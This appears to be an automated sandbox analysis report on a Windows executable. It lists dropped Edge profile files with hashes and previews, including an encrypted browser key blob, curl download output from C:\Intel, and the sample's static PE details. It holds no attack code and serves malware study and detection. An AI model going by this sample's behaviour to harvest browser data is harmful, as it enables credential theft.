                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):71757
                                                                                                                                                                  Entropy (8bit):6.771708343960135
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
                                                                                                                                                                  MD5:E5E3377341056643B0494B6842C0B544
                                                                                                                                                                  SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
                                                                                                                                                                  SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
                                                                                                                                                                  SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4991
                                                                                                                                                                  Entropy (8bit):4.853684242513618
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:nonz1XFZ1aPjS+wwiIMti+NmdeHP7kGVWQyV+VDCAimF:no1EO+YI3+vIG6U
                                                                                                                                                                  MD5:C2D04B7B8C77CC6ECD856490ED9F930E
                                                                                                                                                                  SHA1:D4FD6DD0AA760951D1C7CE382ADAE20B5BC02596
                                                                                                                                                                  SHA-256:AC8F1F61A3AD0382DE68EE520B70064B30232E152DBDD8A479C2F8C90649C625
                                                                                                                                                                  SHA-512:B9D1536A46E2B10569B535A3B6D2E77A837049488D6B23B0A1AF71413DA01A4DEDB1F713A54233A9F854B3DC8FB29124989DFFB62AA37B1D2C0058A1A7204BA6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13381052067045495","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"window_placement":{"bottom":758,"left":10,"maximized":true,"right":1014,"top":10,"work_area_bottom":768,"work_area_left":0,"work_area_right":1024,"work_area_top":0}},"browser_content_container_height":665,"browser_content_container_width":1024,"browser_content_container_x":0,"browser_content_container_y":103,"countryid_at_install":21843,"custom_links":{"list":[]},"data_reduction":{"this_week_number":2871},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13381052067045053"},"download":{"default_directory":""},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_sitelist_location":"","consumer_sitelist_version":"","shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_e

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23768
                                                                                                                                                                  Entropy (8bit):5.594142406778069
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:ySfCt2FRKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVtLlG9yCxrUl8fpFIOIjuk:y4WKR8F1+UoAYDCx9Tuqh0VfUC9xboge
                                                                                                                                                                  MD5:C877B4142C6D0DE2096BEBBABAFF7929
                                                                                                                                                                  SHA1:ED78B5093C5AB2433BFA8D2A541103098FD27669
                                                                                                                                                                  SHA-256:7434ACB5C81BAB3D6933E83C104F160C0B91AF1AF7844368E7645AECFF162423
                                                                                                                                                                  SHA-512:9EAECA82F4BC50B9BCC1B7113B6ABC2A15108466DDFFF7C7AB538D3E86FE01FBDFEF808034FA922C3B68A101AACFACC27C45F6F1E908F1BCD463E0E9662B7544
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"disable_reasons":1,"state":0},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13381052066563424","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","htt

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):3.5931902015385067
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:T9m0XTXl/l7n/lxEkTuM9n:g0XjEL+
                                                                                                                                                                  MD5:1DACA1B13AA5AB79ADF2551D3A87B567
                                                                                                                                                                  SHA1:651BD98A8215DF3FA5912D9871BBFF1AE152E0F7
                                                                                                                                                                  SHA-256:6185413C5B5FBEE668CD4714D435CAE48200F916C6E66A8E007A59559351391B
                                                                                                                                                                  SHA-512:92E9E08ECBAFBEB62C5208EF52919228BEAC60D4F9BCB308F0B5DAC07582F96D6C3488F0FB9549AAA0EB2474A98EB6968195FA17AE19010BF67062B6D8F7116D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@......oy retne.........................X....,.................)..../.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                  Entropy (8bit):2.9972243200613975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:8rvzN00Ee5xn:8rrNgIx
                                                                                                                                                                  MD5:8406B7FFFC864C0D17394F53008327F6
                                                                                                                                                                  SHA1:77A5D8CCE98B5D291910FFD501991255057587C7
                                                                                                                                                                  SHA-256:BE2B1D5971A028A207CFB52E7F520DE865822693621EF30BF0D1C2FC089A1FC0
                                                                                                                                                                  SHA-512:5C4E3FA920432EC12C2488A51B53319A448B8ED9056370990EDCF96284DA67E535163FBBBF5B81E0E46E35FF77E127E1B5A189ECDC486A753E65EE60567A4B54
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(...a.Voy retne..........................E.../.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                  Entropy (8bit):2.9972243200613975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:8rvzN00Ee5xn:8rrNgIx
                                                                                                                                                                  MD5:8406B7FFFC864C0D17394F53008327F6
                                                                                                                                                                  SHA1:77A5D8CCE98B5D291910FFD501991255057587C7
                                                                                                                                                                  SHA-256:BE2B1D5971A028A207CFB52E7F520DE865822693621EF30BF0D1C2FC089A1FC0
                                                                                                                                                                  SHA-512:5C4E3FA920432EC12C2488A51B53319A448B8ED9056370990EDCF96284DA67E535163FBBBF5B81E0E46E35FF77E127E1B5A189ECDC486A753E65EE60567A4B54
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(...a.Voy retne..........................E.../.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2202
                                                                                                                                                                  Entropy (8bit):5.305743169749667
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YnOBhmo05ffPHDiiP1XKsV5lXUZPsvBi/vRVe4WnhJa:BjMffrzdXHr0EvAxVe4mhJa
                                                                                                                                                                  MD5:8D538FD656183C7004CFB4E8689D5583
                                                                                                                                                                  SHA1:E511FA3B1EC7CA0C2BA429C7CF74D3FB93F0C384
                                                                                                                                                                  SHA-256:2EDDEDA7255A6FEAE71B749337548CF3BE25C213EF9B8AB6597F6004F23543C4
                                                                                                                                                                  SHA-512:A87D2DE8133BF54AA5073DB8B1622B7D03D5F52D93615950C49E736BEEAC02E21DB785A4FF8270633445B6BA9EFBBFE7E1A84230AC30B2E09A222A9738188539
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAA2onF6G1EeQY3BWQJxxWnlEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAMmSaSDLMl2ilMZ5cJoyMlNmScsQ5OsudNoE/18DiLYYAAAAADoAAAAACAAAgAAAATZ6UmnaZy++zgp+t3TFXMSN1TFQQxl3ZwEZWMMQBmuQwAAAAoELchcTtgpOFUoy4eul5WuLR63wJEuwEcJcuTQXVbH5y7VsOMq6FE0XckxKvvPDIQAAAAJLfogvHEVPFOa//1PTZN64wL34LfIVgnTTjZc2QcmMhjj1l6U8iKdo7AVTuAtiMMa0JQbYfczMBkOC6L+iP1gU="},"policy":{"last_statistics_update":"13381052064408370"},"profile":{"info_cache":{},"profile_counts_reported":"13381052064141985"},"profile_network_context_service":{"http_cache_finch_experiment_groups":"None None None"},"profiles":{"edge":{"implicit_signin":{"telemetry

                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):399
                                                                                                                                                                  Entropy (8bit):3.385691627678565
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgc9OUFH7Ap9SgOgk:Vz6ykymUexb1U9c9OUFH8r9k
                                                                                                                                                                  MD5:3490C524197672030257E62E0981BF40
                                                                                                                                                                  SHA1:4C1F6EC0C35EE85C4062C95BB5096841F5B86A20
                                                                                                                                                                  SHA-256:DD2DDCD77BD9DA6BAB09AAEFF975D3B80DC402DB87CCED23BADD2E11EB3BEDF3
                                                                                                                                                                  SHA-512:E448E37DB6AB5661BA810DCF3D515D10E1FDFB1B049D181B978AFEA1CF659C0B7BCEE53B5375DC34D6C51ECA62EBBFFB082B77F78962F0F24EF1392092263D61
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 23 4477 23 1033 0 0 2202 0 0:00:02 --:--:-- 0:00:02 2202.100 4477 100 4477 0 0 9545 0 --:--:-- --:--:-- --:--:-- 9545..

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.847150014849247
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                                                                                                                  • InstallShield setup (43055/19) 0.43%
                                                                                                                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                  File name:Yv24LkKBY6.exe
                                                                                                                                                                  File size:956'256 bytes
                                                                                                                                                                  MD5:f0aba799546b1ce04037793579de3c94
                                                                                                                                                                  SHA1:3477b56ece979666e4b094534e074f39d52545fe
                                                                                                                                                                  SHA256:de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
                                                                                                                                                                  SHA512:e01cca0ddafd248cdd550ad4a5b6aeec3dbb7bfc4fc099733a725d90d2b8b295a05da090c2afe8f55659d18cd57152fce2785cb1f8d62b103e815b2cb8b33061
                                                                                                                                                                  SSDEEP:24576:/X48QE+UUvlJSuoBa6xGuPAIV8D/6kN1betf2Zo0bKrx:/Xz+aUM/ID6yBetOAN
                                                                                                                                                                  TLSH:AE150219A1022235D49357704CD7E22EF936FF58562AD8CBB6D83F099B331EA151A38F
                                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:2564a4a6a5bfb5af

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x425468
                                                                                                                                                                  Entrypoint Section:CODE
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
